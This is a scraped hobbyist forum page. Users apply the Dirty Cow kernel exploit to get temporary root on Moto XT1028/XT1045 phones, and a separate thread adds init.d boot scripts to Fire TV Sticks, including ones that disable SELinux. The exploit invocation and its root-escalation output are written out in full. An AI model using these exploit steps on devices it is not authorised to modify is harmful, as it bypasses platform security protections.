Click to collapse
how to be included on my build rom?
Thanks to @kryz who managed to generalize the Dirty Cow exploit, XT1028 now has a way to get temporary root : link. Notice that the /system will still be read-only, but at least full access to /data is available. Given the state of XT1028, this looks like a pretty good progress!
Steps to get temp root (in Lollipop):
1) install Croowt.apk, use the 2nd option in the menu : "Get root"
2) install SuperSu apk from the playstore (don't update the binary)
3) install RootChecker apk from the playstore
4) enjoy temporary root (until hard reboot)
The earlier post for Android 4.4.4:
For all KitKat holdouts, I've tried to use Dirty Cow and got temp root. Could work on other Android versions as well. Now, at least this root one does not seem to crash as much (unlike Kingroot). Here is a brief set of steps. First, download this package:
https://mega.nz/#!LFlBRAhS!rDl7PJMkFq7HqUDDgbKV6ddv-C3qkQIJl_CJkhkx2sc
Then
Code:
adb push dirtycow /data/local/tmp
adb push cow-execute /data/local/tmp
adb shell
cd /data/local/tmp
chmod 0777 *
[email protected]_cdma:/data/local/tmp $ ./dirtycow /system/bin/run-as ./cow-execute
bin/run-as ./cow-execute <
warning: new file size (13728) and file old size (9432) differ
size 13728
[] mmap 0xb6e64000
[] exploit (patch)
[] currently 0xb6e64000=464c457f
[] madvise = 0xb6e64000 13728
[] madvise = 0 1048576
[] /proc/self/mem 0 1048576
[] exploited 0xb6e64000=464c457f
[email protected]_cdma:/data/local/tmp $ run-as -exec id
run-as -exec id
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'id' with 0 arguments
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),10
15(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net
_bw_stats) context=u:r:runas:s0
[email protected]_cdma:/data/local/tmp $ run-as -exec sh
run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments
[email protected]_cdma:/data/local/tmp #
Not sure how much one can do here without bootloader unlock though ...
Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.
linuxgator said:
Tried it on my Cricket Wireless XT1045 which has been stuck on 4.4.4 without any kind of root for a while now and it worked as shown in your post. Hopefully it'll be a stepping stone to some more permanent kind of root, maybe even something that can be used with Sunshine to unlock the bootloader.
Click to expand...
Click to collapse
Try this, see if you can copy su binary to system (it will disappear after reboot) :
http://android.stackexchange.com/questions/127230/android-adb-has-root-access-but-no-su-binary
Then soft reboot to make it work, in root shell type :
killall zygote
The hope is to get you SuperSu (until next reboot). I believe we are probably back to where these phones were with the old Pie exploit:
http://forum.xda-developers.com/moto-x/orig-development/root-4-4-x-pie-motorola-devices-t2771623
Kingroot used to be able to make a fake copy of itself into /system which disappeared soon after.
I have this stupid Watcher on my phone, and don't want to try these other steps since I don't want it to kill my corporate email ...
Updated with the new Lollipop instructions!
@linuxgator
Nice link down
@bibikalka any chance you can post the kitkat version again?
[UPDATE #1] I've added a zip file with the 2 scripts, with UNIX line endings , as suggested below by @aftvNews . Cheers.
[UPDATE #2] I've added a zip file with the 2 extra scripts to go into /etc/init.d, as requested by @Axecaster . These will need the same ownership and permissions as enableotg. They disable SELinux and set the permissions on the recovery directories. Cheers.
Having had a look around the android image on my Fire TV Stick (v1) [ FireOS 5.2.1.1 @rbox ] I found that a script, which doesn't exist, called /system/bin/factoryadb.sh was being run by /init.build.rc on boot.
I was able to create a simple script to run scripts in /etc/init.d on boot.
UPDATE (05/04/19): Now I've got root access on my FireTV Gen 2 [ FireOS 5.2.6.9 ] I can see the see these instructions will also work, although the OTG enabling is not needed
NOTE: I've only tested this on a 1st generation Fire TV Stick but may work on Fire TV boxes if they also call /system/bin/factoryadb.sh from /init.build.rc
Before you do this please make sure factoryadb.sh is NOT on your FireTV and that it is called from /init.build.rc by connecting to your FireTV via adb and running the following commands
Code:
adb shell
su
grep factoryadb /init.build.rc && ls -l /system/bin/factoryadb.sh
Hopefully this will return
Code:
service factoryadb /system/bin/factoryadb.sh
/system/bin/factoryadb.sh: No such file or directory
Now continue ...
My factoryadb.sh script
Code:
#!/system/bin/sh
#
# Execute all scripts in /etc/init.d
if [ -d /etc/init.d ]
then
for f in `ls /etc/init.d/* 2>/dev/null`
do
if [ -s ${f} ]
then
echo Executing ${f} ... >/dev/kmsg
/system/bin/sh ${f}
fi
done
fi
NOTE: Make sure this file has UNIX line endings only. Notepad++ has an option to specify UNIX line endings.
I also have a simple script to enable OTG which I called enableotg, again MUST have UNIX line endings.
Code:
#!/system/bin/sh
echo 1 > /sys/devices/platform/bcmpmu_otg_xceiv/host
Connect to the Fire TV Stick via adb and run the following commands
Code:
adb push factoryadb.sh /sdcard/
adb push enableotg /sdcard/
adb shell
su
mount -o remount,rw /system
mkdir /etc/init.d
cp /sdcard/factoryadb.sh /system/bin/
cp /sdcard/enableotg /etc/init.d/
chown 0:0 /system/bin/factoryadb.sh /etc/init.d /etc/init.d/enableotg
chmod 755 /system/bin/factoryadb.sh /etc/init.d /etc/init.d/enableotg
mount -o remount,ro /system
reboot
When the FireTV Stick has rebooted then reconnect via adb and run the following commands
Code:
adb shell
su
dmesg | grep -e factoryadb -e Executing -e bcmpmu
You should see something similar to
Code:
<6>[ 3.005279] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Probing started...
<6>[ 3.007690] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Probing successful
<3>[ 4.998016] init: Warning! Service factoryadb needs a SELinux domain defined; please fix!
<4>[ 5.573242] Executing /etc/init.d/enableotg ...
<6>[ 5.579040] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Switching to Host
All is working and OTG should be working about 5 seconds after leaving the TWRP screen and long before Android has finished booting.
If you have an ethernet dongle attached it should have an IP address before the launcher starts
NOTE: The SELinux warning can be safely ignored.
Hope this helps.
Nicely done. Clever using the missing factoryadb.sh to roll your own init.d.
Might be easier for some if you just upload/attach your factoryadb.sh and enableotg files that others can download, so there's no need to worry about proper UNIX line endings.
Worked nicely on one of my gen 1 sticks running 5.2.4.1_r2.
OTG works for USB pendrive?
AFTVnews.com said:
Nicely done. Clever using the missing factoryadb.sh to roll your own init.d.
Might be easier for some if you just upload/attach your factoryadb.sh and enableotg files that others can download, so there's no need to worry about proper UNIX line endings.
Click to expand...
Click to collapse
Doh! Completely missed the section to "Attach Files" when I was writing the post
I've now added a zip file with the 2 scripts with UNIX line endings to the post.
Cheers
Awesome job figuring out this was possible! I can confirm the init.d part works just fine on the FireTV-v1 on Rbox v5.2.4.1_r2 (didn't test OTG scripts as I already have a full USB port).
I am going to be adding in your init.d support to my Playing with Fire MOD for the next release.
Now just got to get PS3 / Xbox One controller kernel plugins compiled and working for the Gen1 devices now that init.d works. :good:
dony71 said:
OTG works for USB pendrive?
Click to expand...
Click to collapse
I tried this on fire tv stick 1, usb storage does not work.
dmesg shows my Kingston USB pendrive being recognized by kernel,
but registered driver debus_usbdev ?
So I guess kernel doesn't have USB storage driver?
----------------------------------------------------------------------------------------------------
<6>[ 7.267791] usb 3-1: new high speed USB device number 2 using dwc_otg
<6>[ 7.538024] usb 3-1: New USB device found, idVendor=0951, idProduct=1642
<6>[ 7.538116] usb 3-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
<6>[ 7.538238] usb 3-1: Product: DT 101 G2
<6>[ 7.538330] usb 3-1: Manufacturer: Kingston
<6>[ 7.538482] usb 3-1: SerialNumber: 001CC0EC3509EA50B0000232
<6>[ 47.829345] usbcore: registered new interface driver dbus_usbdev
<3>[ 60.385131] init: Warning! Service adb_usb needs a SELinux domain defined; please fix!
Does this enable the use of USB storage ? as ive had this setup for over 6 months now to enable usb pheripal support on boot (with a script booter). If not i guess its still good to do away with the extra apk i had installed to enable my script at boot.
What does this actually do? My FireTV already can read from usb drives.
tdfsu said:
What does this actually do? My FireTV already can read from usb drives.
Click to expand...
Click to collapse
Seems mainly for gen 1 sticks to enable usb peripherals. Each boot requires a command to be re-run to recognize usb keyboards, mice, wired networking port, etc. Someone correct me if I'm wrong, but this configuration could in-theory assign multiple scripts to run on boot without extra apps installed.
Axecaster said:
Seems mainly for gen 1 sticks to enable usb peripherals. Each boot requires a command to be re-run to recognize usb keyboards, mice, wired networking port, etc. Someone correct me if I'm wrong, but this configuration could in-theory assign multiple scripts to run on boot without extra apps installed.
Click to expand...
Click to collapse
Yes Gen2 sticks and the main FireTV's seem to have OTG already enabled but Gen1 sticks don't.
However even though I've only specified enabling OTG in my initial post, as Axecaster mentioned I do in fact have a number of scripts in /etc/init.d that run on boot.
e.g. Set SELinux to Permissive, set full R/W access on the recovery directories, cleanup some temp files on boot etc
I'm currently checking to see if I can set a static IP on the USB Ethernet adapter I use with my Gen1 stick which will most likely result in a new script in /etc/init.d
I also need to investigate the USB storage options more though. Might be the same issue as I'm having with NFS mounts. I can mount an NFS share but currently only root can see it!
Hope this helps.
tgellen said:
Yes Gen2 sticks and the main FireTV's seem to have OTG already enabled but Gen1 sticks don't.
However even though I've only specified enabling OTG in my initial post, as Axecaster mentioned I do in fact have a number of scripts in /etc/init.d that run on boot.
e.g. Set SELinux to Permissive, set full R/W access on the recovery directories, cleanup some temp files on boot etc
I'm currently checking to see if I can set a static IP on the USB Ethernet adapter I use with my Gen1 stick which will most likely result in a new script in /etc/init.d
I also need to investigate the USB storage options more though. Might be the same issue as I'm having with NFS mounts. I can mount an NFS share but currently only root can see it!
Hope this helps.
Click to expand...
Click to collapse
Have you checked or modified your "persist-usb-config" file yet? If your's has different values than this (from a FireTV-Box) edit it to match mine and see if that helps.
Code:
[email protected]:/ # cat /data/property/persist.sys.usb.config
diag,serial_smd,serial_tty,rmnet_bam,mass_storage,adb
As for your NFS shares issue you are going to need to do a Bind Mount to get non-root users able to access the directory. Im using the same bind-mount method to get a bunch of additional GApps installed on the FireTV by binding folders in /data/local/ --> /system/priv-app and using your /etc/init.d/ discovery to launch it automatically on boot.
[email protected]: # mkdir /data/local/nfs && chmod 0755 /data/local/nfs && chown 0:0 /data/local/nfs
init.d startup script:
Code:
#!/system/bin/sh
NFSPATH=/path/to/nfs
NFSDATA=/data/local/nfs
(mount -o bind $NFSPATH $NFSDATA) ; (mount -o remount nosuid,nodev,noexec,reltime,async $NFSPATH)
SimLynks said:
Have you checked or modified your "persist-usb-config" file yet? If your's has different values than this (from a FireTV-Box) edit it to match mine and see if that helps.
Click to expand...
Click to collapse
Result:
Code:
[email protected]:/ # cat /data/property/persist.sys.usb.config
[B]adb[/B][email protected]:/ #
I pulled the file, replaced "adb" with "iag,serial_smd,serial_tty,rmnet_bam,mass_storage,adb", pushed it back and rebooted the device.
Result: ADB is disabled and otg doesn't seem to work (usb flash drive)
Enabling ADB sets the file back to "adb" and after a reboot otg is working again.
after installing xposed framework on the fire tv stick this method for otg on boot not longer works.
any solutions?
thecoonx said:
after installing xposed framework on the fire tv stick this method for otg on boot not longer works.
any solutions?
Click to expand...
Click to collapse
Hmm. I installed this method after xposed framework. As far as I'm aware, everything seems to be working.
thecoonx said:
after installing xposed framework on the fire tv stick this method for otg on boot not longer works.
any solutions?
Click to expand...
Click to collapse
Axecaster said:
Hmm. I installed this method after xposed framework. As far as I'm aware, everything seems to be working.
Click to expand...
Click to collapse
So only setup your scripts after you are done flashing a PreRooted ROM &/or SuperSU &/or XPosed Framework. So in other words only after your done messing with things that mess with /System in TWRP. Or you will have to reset them again.
SimLynks said:
Have you checked or modified your "persist-usb-config" file yet? If your's has different values than this (from a FireTV-Box) edit it to match mine and see if that helps.
Code:
[email protected]:/ # cat /data/property/persist.sys.usb.config
diag,serial_smd,serial_tty,rmnet_bam,mass_storage,adb
As for your NFS shares issue you are going to need to do a Bind Mount to get non-root users able to access the directory. Im using the same bind-mount method to get a bunch of additional GApps installed on the FireTV by binding folders in /data/local/ --> /system/priv-app and using your /etc/init.d/ discovery to launch it automatically on boot.
[email protected]: # mkdir /data/local/nfs && chmod 0755 /data/local/nfs && chown 0:0 /data/local/nfs
init.d startup script:
Code:
#!/system/bin/sh
NFSPATH=/path/to/nfs
NFSDATA=/data/local/nfs
(mount -o bind $NFSPATH $NFSDATA) ; (mount -o remount nosuid,nodev,noexec,reltime,async $NFSPATH)
Click to expand...
Click to collapse
Hi SimLynks,
Thanks for your suggestion. The bind mount did make the directory available for the non-root user but unfortunately it's contents were still only visible to the root user
I'll keep on trying
Cheers.
tgellen said:
[UPDATE #1] I've added a zip file with the 2 scripts, with UNIX line endings , as suggested below by AFTVNews. Cheers.
[UPDATE #2] I've added a zip file with the 2 extra scripts to go into /etc/init.d, as requested by Axecaster. These will need the same ownership and permissions as enableotg. They disable SELinux and set the permissions on the recovery directories. Cheers.
Having had a look around the android image on my Fire TV Stick (v1) [FireOS 5.2.1.1 rbox] I found that a script, which doesn't exist, called /system/bin/factoryadb.sh was being run by /init.build.rc on boot.
I was able to create a simple script to run scripts in /etc/init.d on boot.
NOTE: I've only tested this on a 1st generation Fire TV Stick but may work on Fire TV boxes if they also call /system/bin/factoryadb.sh from /init.build.rc
Before you do this please make sure factoryadb.sh is NOT on your FireTV and that it is called from /init.build.rc by connecting to your FireTV via adb and running the following commands
Code:
adb shell
su
grep factoryadb /init.build.rc && ls -l /system/bin/factoryadb.sh
Hopefully this will return
Code:
service factoryadb /system/bin/factoryadb.sh
/system/bin/factoryadb.sh: No such file or directory
Now continue ...
My factoryadb.sh script
Code:
#!/system/bin/sh
#
# Execute all scripts in /etc/init.d
if [ -d /etc/init.d ]
then
for f in `ls /etc/init.d/* 2>/dev/null`
do
if [ -s ${f} ]
then
echo Executing ${f} ... >/dev/kmsg
/system/bin/sh ${f}
fi
done
fi
NOTE: Make sure this file has UNIX line endings only. Notepad++ has an option to specify UNIX line endings.
I also have a simple script to enable OTG which I called enableotg, again MUST have UNIX line endings.
Code:
#!/system/bin/sh
echo 1 > /sys/devices/platform/bcmpmu_otg_xceiv/host
Connect to the Fire TV Stick via adb and run the following commands
Code:
adb push factoryadb.sh /sdcard/
adb push enableotg /sdcard/
adb shell
su
mount -o remount,rw /system
mkdir /etc/init.d
cp /sdcard/factoryadb.sh /system/bin/
cp /sdcard/enableotg /etc/init.d/
chown 0:0 /system/bin/factoryadb.sh /etc/init.d /etc/init.d/enableotg
chmod 755 /system/bin/factoryadb.sh /etc/init.d /etc/init.d/enableotg
mount -o remount,ro /system
reboot
When the FireTV Stick has rebooted then reconnect via adb and run the following commands
Code:
adb shell
su
dmesg | grep -e factoryadb -e Executing -e bcmpmu
You should see something similar to
Code:
<6>[ 3.005279] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Probing started...
<6>[ 3.007690] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Probing successful
<3>[ 4.998016] init: Warning! Service factoryadb needs a SELinux domain defined; please fix!
<4>[ 5.573242] Executing /etc/init.d/enableotg ...
<6>[ 5.579040] bcmpmu_otg_xceiv bcmpmu_otg_xceiv: Switching to Host
All is working and OTG should be working about 5 seconds after leaving the TWRP screen and long before Android has finished booting.
If you have an ethernet dongle attached it should have an IP address before the launcher starts
NOTE: The SELinux warning can be safely ignored.
Hope this helps.
Click to expand...
Click to collapse
Can this be used in some way to enable otg while at the TWRP countdown bar ( as to use keyboard/mouse/airmouse within TWRP), As it's a whole lot easier to use than the ADB mouse, having to plug firestick into laptop/computer if you need to be in recovery, if it is possible it could be easier.
I use the airmouse/keyboard method myself when I go I to recovery but have to use my home made otg cable and swap over usb to computer after running the command to usb dongle for the airmouse (melee F10 pro). After the command has run while plugged into my laptop I unplug the laptop connection and plug in my dongle and I navigate TWRP with my remote.
It is any chance that we can enable OTG on no-rooted devices of firetv gen 1 ?I have firmware 5.2.6.7 so I think there is no way I can root the device. Thanks!
minute said:
It is any chance that we can enable OTG on no-rooted devices of firetv gen 1 ?I have firmware 5.2.6.7 so I think there is no way I can root the device. Thanks!
Click to expand...
Click to collapse
Sorry. Unfortunately you need root access to change the OTG value on the FireTV gen 1